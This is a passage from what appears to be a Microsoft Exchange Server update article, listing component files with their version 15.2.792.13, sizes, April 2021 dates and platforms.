x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.2.792.13| 211,864| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.2.792.13| 1,341,336| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.2.792.13| 511,864| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.2.792.13| 47,512| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.2.792.13| 873,352| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.2.792.13| 1,352,064| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.2.792.13| 30,600| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.2.792.13| 130,456| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.2.792.13| 1,018,760| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.2.792.13| 111,512| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.2.792.13| 34,688| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.2.792.13| 19,336| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.2.792.13| 14,744| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.servicehost.exe| 15.2.792.13| 60,808| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.2.792.13| 50,584| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.2.792.13| 14,208| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.2.792.13| 14,216| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.services.common.dll| 15.2.792.13| 74,104| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.services.dll| 15.2.792.13| 8,481,152| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.2.792.13| 30,104| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.2.792.13| 633,720| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.2.792.13| 1,651,080| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.services.json.dll| 15.2.792.13| 296,328| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.services.messaging.dll| 15.2.792.13| 43,400| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.2.792.13| 233,368| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.services.surface.dll| 15.2.792.13| 178,584| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.services.wcf.dll| 15.2.792.13| 348,544| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.2.792.13| 56,704| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.2.792.13| 93,080| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.setup.common.dll| 15.2.792.13| 296,328| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.2.792.13| 35,736| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.setup.console.dll| 15.2.792.13| 27,016| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.setup.gui.dll| 15.2.792.13| 114,568| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.setup.parser.dll| 15.2.792.13| 53,656| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.2.792.13| 75,144| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.2.792.13| 142,728| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.2.792.13| 24,968| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.2.792.13| 15,240| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.sharedcache.exe| 15.2.792.13| 58,760| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.2.792.13| 27,008| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.2.792.13| 47,000| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.sqm.dll| 15.2.792.13| 46,976| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.store.service.exe| 15.2.792.13| 28,040| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.store.worker.exe| 15.2.792.13| 26,520| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.2.792.13| 13,704| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.2.792.13| 31,640| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.storeprovider.dll| 15.2.792.13| 1,205,144| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.structuredquery.dll| 15.2.792.13| 158,600| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.2.792.13| 628,104| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.2.792.13| 13,184| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.2.792.13| 16,280| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.2.792.13| 13,192| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.textprocessing.dll| 15.2.792.13| 221,576| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.2.792.13| 13,712| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.2.792.13| 29,048| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.2.792.13| 138,648| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.2.792.13| 21,888| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.2.792.13| 40,312| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.2.792.13| 22,912| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.2.792.13| 21,392| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.2.792.13| 212,352| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.2.792.13| 98,688| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.2.792.13| 22,936| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.2.792.13| 169,352| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.2.792.13| 18,328| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.2.792.13| 20,864| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.2.792.13| 31,608| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.2.792.13| 46,984| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.2.792.13| 30,104| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.2.792.13| 53,128| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.2.792.13| 44,952| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.2.792.13| 18,328| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.2.792.13| 46,472| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.2.792.13| 46,456| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.2.792.13| 28,056| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.transport.common.dll| 15.2.792.13| 457,096| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.2.792.13| 18,304| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.2.792.13| 30,592| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.dll| 15.2.792.13| 4,183,928| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.2.792.13| 182,160| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.2.792.13| 121,752| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.2.792.13| 403,864| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.2.792.13| 14,720| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.2.792.13| 90,008| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.transport.logging.dll| 15.2.792.13| 88,984| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.2.792.13| 68,504| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.2.792.13| 63,384| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.2.792.13| 430,472| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.transport.net.dll| 15.2.792.13| 122,256| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.2.792.13| 17,784| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.2.792.13| 29,064| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.2.792.13| 60,824| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.2.792.13| 50,056| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.2.792.13| 33,144| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.2.792.13| 113,048| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.2.792.13| 18,312| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.2.792.13| 52,096| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.transport.storage.dll| 15.2.792.13| 675,216| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.2.792.13| 23,960| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.2.792.13| 17,800| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.2.792.13| 487,304| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.2.792.13| 306,072| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.2.792.13| 15,768| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.2.792.13| 46,472| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.2.792.13| 1,044,360| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.2.792.13| 15,256| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.2.792.13| 18,816| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.2.792.13| 18,808| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.2.792.13| 118,664| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.2.792.13| 924,552| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.um.umcore.dll| 15.2.792.13| 1,469,320| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.2.792.13| 32,632| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.2.792.13| 41,880| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.2.792.13| 24,976| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.2.792.13| 15,232| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.2.792.13| 83,352| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.2.792.13| 50,072| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.2.792.13| 642,432| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.2.792.13| 186,256| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.2.792.13| 67,480| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:04| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.2.792.13| 56,728| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.2.792.13| 27,544| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.2.792.13| 120,712| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.2.792.13| 31,640| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.2.792.13| 57,240| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.2.792.13| 35,720| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.webservices.dll| 15.2.792.13| 1,054,096| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.2.792.13| 67,976| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.2.792.13| 23,432| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.wopiclient.dll| 15.2.792.13| 77,184| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.2.792.13| 17,304| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.2.792.13| 29,064| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.2.792.13| 505,224| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.2.792.13| 14,728| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.2.792.13| 36,760| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.2.792.13| 66,432| 04-Apr-2021| 10:05| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.2.792.13| 19,344| 04-Apr-2021| 10:06| x86 \nMicrosoft.filtering.dll| 15.2.792.13| 113,032| 04-Apr-2021| 10:06| x86 \nMicrosoft.filtering.exchange.dll| 15.2.792.13| 57,224| 04-Apr-2021| 10:03| x86 \nMicrosoft.filtering.interop.dll| 15.2.792.13| 15,240| 04-Apr-2021| 10:03| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.2.792.13| 46,992| 04-Apr-2021| 10:07| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.2.792.13| 15,744| 04-Apr-2021| 10:05| x64 \nMicrosoft.forefront.filtering.common.dll| 15.2.792.13| 23,944| 04-Apr-2021| 10:04| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.2.792.13| 22,416| 04-Apr-2021| 10:05| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.2.792.13| 34,696| 04-Apr-2021| 10:05| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,949| 04-Apr-2021| 10:04| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,325| 04-Apr-2021| 10:04| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.2.792.13| 1,519,000| 04-Apr-2021| 10:03| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.2.792.13| 13,192| 04-Apr-2021| 10:04| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.2.792.13| 33,160| 04-Apr-2021| 10:04| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.2.792.13| 18,304| 04-Apr-2021| 10:05| x86 \nMicrosoft.forefront.reporting.common.dll| 15.2.792.13| 46,456| 04-Apr-2021| 10:03| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.2.792.13| 50,568| 04-Apr-2021| 10:05| x86 \nMicrosoft.isam.esent.collections.dll| 15.2.792.13| 72,576| 04-Apr-2021| 10:03| x86 \nMicrosoft.isam.esent.interop.dll| 15.2.792.13| 541,576| 04-Apr-2021| 10:03| x86 \nMicrosoft.managementgui.dll| 15.2.792.13| 133,496| 04-Apr-2021| 10:06| x86 \nMicrosoft.mce.interop.dll| 15.2.792.13| 24,472| 04-Apr-2021| 10:03| x86 \nMicrosoft.office.audit.dll| 15.2.792.13| 124,824| 04-Apr-2021| 10:03| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.2.792.13| 593,288| 04-Apr-2021| 10:04| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.2.792.13| 42,376| 04-Apr-2021| 10:05| x86 \nMicrosoft.office.compliance.console.core.dll| 15.2.792.13| 217,992| 04-Apr-2021| 10:05| x86 \nMicrosoft.office.compliance.console.dll| 15.2.792.13| 854,912| 04-Apr-2021| 10:06| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.2.792.13| 485,760| 04-Apr-2021| 10:04| x86 \nMicrosoft.office.compliance.core.dll| 15.2.792.13| 413,064| 04-Apr-2021| 10:03| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.2.792.13| 36,224| 04-Apr-2021| 10:04| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.2.792.13| 84,880| 04-Apr-2021| 10:03| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.2.792.13| 1,782,144| 04-Apr-2021| 10:03| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.2.792.13| 49,544| 04-Apr-2021| 10:04| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.2.792.13| 27,520| 04-Apr-2021| 10:05| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.2.792.13| 174,984| 04-Apr-2021| 10:03| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.2.792.13| 166,296| 04-Apr-2021| 10:04| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.2.792.13| 40,336| 04-Apr-2021| 10:03| x86 \nMicrosoft.online.box.shell.dll| 15.2.792.13| 46,464| 04-Apr-2021| 10:03| x86 \nMicrosoft.powershell.hostingtools.dll| 15.2.792.13| 67,976| 04-Apr-2021| 10:03| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.2.792.13| 67,976| 04-Apr-2021| 10:03| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.2.792.13| 120,208| 04-Apr-2021| 10:04| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,150| 04-Apr-2021| 10:05| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,092| 04-Apr-2021| 10:06| Not applicable \nMovemailbox.ps1| Not applicable| 61,196| 04-Apr-2021| 10:05| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,630| 04-Apr-2021| 10:06| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,560| 04-Apr-2021| 10:06| Not applicable \nMpgearparser.dll| 15.2.792.13| 99,712| 04-Apr-2021| 10:05| x64 \nMsclassificationadapter.dll| 15.2.792.13| 248,704| 04-Apr-2021| 10:04| x64 \nMsexchangecompliance.exe| 15.2.792.13| 78,728| 04-Apr-2021| 10:04| x86 \nMsexchangedagmgmt.exe| 15.2.792.13| 25,464| 04-Apr-2021| 10:06| x86 \nMsexchangedelivery.exe| 15.2.792.13| 38,808| 04-Apr-2021| 10:06| x86 \nMsexchangefrontendtransport.exe| 15.2.792.13| 31,640| 04-Apr-2021| 10:05| x86 \nMsexchangehmhost.exe| 15.2.792.13| 27,024| 04-Apr-2021| 10:04| x86 \nMsexchangehmrecovery.exe| 15.2.792.13| 29,592| 04-Apr-2021| 10:03| x86 \nMsexchangemailboxassistants.exe| 15.2.792.13| 72,568| 04-Apr-2021| 10:06| x86 \nMsexchangemailboxreplication.exe| 15.2.792.13| 20,888| 04-Apr-2021| 10:07| x86 \nMsexchangemigrationworkflow.exe| 15.2.792.13| 69,008| 04-Apr-2021| 10:06| x86 \nMsexchangerepl.exe| 15.2.792.13| 71,064| 04-Apr-2021| 10:05| x86 \nMsexchangesubmission.exe| 15.2.792.13| 123,288| 04-Apr-2021| 10:07| x86 \nMsexchangethrottling.exe| 15.2.792.13| 39,824| 04-Apr-2021| 10:06| x86 \nMsexchangetransport.exe| 15.2.792.13| 74,136| 04-Apr-2021| 10:07| x86 \nMsexchangetransportlogsearch.exe| 15.2.792.13| 139,160| 04-Apr-2021| 10:05| x86 \nMsexchangewatchdog.exe| 15.2.792.13| 55,680| 04-Apr-2021| 10:07| x64 \nMspatchlinterop.dll| 15.2.792.13| 53,640| 04-Apr-2021| 10:04| x64 \nNativehttpproxy.dll| 15.2.792.13| 91,528| 04-Apr-2021| 10:04| x64 \nNavigatorparser.dll| 15.2.792.13| 636,800| 04-Apr-2021| 10:07| x64 \nNego2nativeinterface.dll| 15.2.792.13| 19,328| 04-Apr-2021| 10:03| x64 \nNegotiateclientcertificatemodule.dll| 15.2.792.13| 30,104| 04-Apr-2021| 10:04| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 19,792| 04-Apr-2021| 10:05| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,607| 04-Apr-2021| 10:06| Not applicable \nNtspxgen.dll| 15.2.792.13| 80,792| 04-Apr-2021| 10:06| x64 \nOleconverter.exe| 15.2.792.13| 173,960| 04-Apr-2021| 10:07| x64 \nOutsideinmodule.dll| 15.2.792.13| 87,944| 04-Apr-2021| 10:04| x64 \nOwaauth.dll| 15.2.792.13| 92,032| 04-Apr-2021| 10:04| x64 \nPerf_common_extrace.dll| 15.2.792.13| 245,144| 04-Apr-2021| 10:03| x64 \nPerf_exchmem.dll| 15.2.792.13| 86,408| 04-Apr-2021| 10:06| x64 \nPipeline2.dll| 15.2.792.13| 1,454,480| 04-Apr-2021| 10:04| x64 \nPreparemoverequesthosting.ps1| Not applicable| 71,019| 04-Apr-2021| 10:06| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,253| 04-Apr-2021| 10:06| Not applicable \nProductinfo.managed.dll| 15.2.792.13| 27,032| 04-Apr-2021| 10:04| x86 \nProxybinclientsstringsdll| 15.2.792.13| 924,568| 04-Apr-2021| 10:05| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,262| 04-Apr-2021| 10:06| Not applicable \nQuietexe.exe| 15.2.792.13| 14,720| 04-Apr-2021| 10:07| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,540| 04-Apr-2021| 10:04| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,659| 04-Apr-2021| 10:04| Not applicable \nRemoteexchange.ps1| Not applicable| 23,601| 04-Apr-2021| 10:06| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,712| 04-Apr-2021| 10:05| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,030| 04-Apr-2021| 10:05| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,036| 04-Apr-2021| 10:05| Not applicable \nReplaycrimsonmsg.dll| 15.2.792.13| 1,104,784| 04-Apr-2021| 10:04| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,480| 04-Apr-2021| 10:04| Not applicable \nResetcasservice.ps1| Not applicable| 21,735| 04-Apr-2021| 10:06| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,105| 04-Apr-2021| 10:06| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,145| 04-Apr-2021| 10:07| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,198| 04-Apr-2021| 10:04| Not applicable \nRightsmanagementwrapper.dll| 15.2.792.13| 86,416| 04-Apr-2021| 10:07| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,814| 04-Apr-2021| 10:06| Not applicable \nRpcperf.dll| 15.2.792.13| 23,432| 04-Apr-2021| 10:05| x64 \nRpcproxyshim.dll| 15.2.792.13| 39,296| 04-Apr-2021| 10:05| x64 \nRulesauditmsg.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:07| x64 \nSafehtmlnativewrapper.dll| 15.2.792.13| 34,680| 04-Apr-2021| 10:06| x64 \nScanenginetest.exe| 15.2.792.13| 956,288| 04-Apr-2021| 10:04| x64 \nScanningprocess.exe| 15.2.792.13| 739,216| 04-Apr-2021| 10:04| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,840| 04-Apr-2021| 10:06| Not applicable \nServicecontrol.ps1| Not applicable| 52,333| 04-Apr-2021| 10:07| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,758| 04-Apr-2021| 10:05| Not applicable \nSettingsadapter.dll| 15.2.792.13| 116,120| 04-Apr-2021| 10:04| x64 \nSetup.exe| 15.2.792.13| 20,376| 04-Apr-2021| 10:05| x86 \nSetupui.exe| 15.2.792.13| 188,296| 04-Apr-2021| 10:07| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,213| 04-Apr-2021| 10:05| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,835| 04-Apr-2021| 10:04| Not applicable \nStatisticsutil.dll| 15.2.792.13| 142,208| 04-Apr-2021| 10:04| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,121| 04-Apr-2021| 10:04| Not applicable \nStoretsconstants.ps1| Not applicable| 15,858| 04-Apr-2021| 10:04| Not applicable \nStoretslibrary.ps1| Not applicable| 28,007| 04-Apr-2021| 10:04| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.2.792.13| 28,536| 04-Apr-2021| 10:04| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,951| 04-Apr-2021| 10:06| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 44,001| 04-Apr-2021| 10:05| Not applicable \nTextconversionmodule.dll| 15.2.792.13| 86,424| 04-Apr-2021| 10:07| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,755| 04-Apr-2021| 10:03| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,461| 04-Apr-2021| 10:04| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,033| 04-Apr-2021| 10:04| Not applicable \nUninstall_antispamagents.ps1| Not applicable| 15,477| 04-Apr-2021| 10:05| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,058| 04-Apr-2021| 10:06| Not applicable \nUpdatecas.ps1| Not applicable| 35,802| 04-Apr-2021| 10:07| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,746| 04-Apr-2021| 10:07| Not applicable \nUpdateserver.exe| 15.2.792.13| 3,014,536| 04-Apr-2021| 10:04| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,180| 04-Apr-2021| 10:05| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,814| 04-Apr-2021| 10:07| Not applicable \nWsbexchange.exe| 15.2.792.13| 125,336| 04-Apr-2021| 10:07| x64 \nX400prox.dll| 15.2.792.13| 103,312| 04-Apr-2021| 10:06| x64 \n_search.lingoperators.a| 15.2.792.13| 34,688| 04-Apr-2021| 10:05| Not applicable \n_search.lingoperators.b| 15.2.792.13| 34,688| 04-Apr-2021| 10:05| Not applicable \n_search.mailboxoperators.a| 15.2.792.13| 290,184| 04-Apr-2021| 10:05| Not applicable \n_search.mailboxoperators.b| 15.2.792.13| 290,184| 04-Apr-2021| 10:05| Not applicable \n_search.operatorschema.a| 15.2.792.13| 485,776| 04-Apr-2021| 10:04| Not applicable \n_search.operatorschema.b| 15.2.792.13| 485,776| 04-Apr-2021| 10:04| Not applicable \n_search.tokenoperators.a| 15.2.792.13| 113,544| 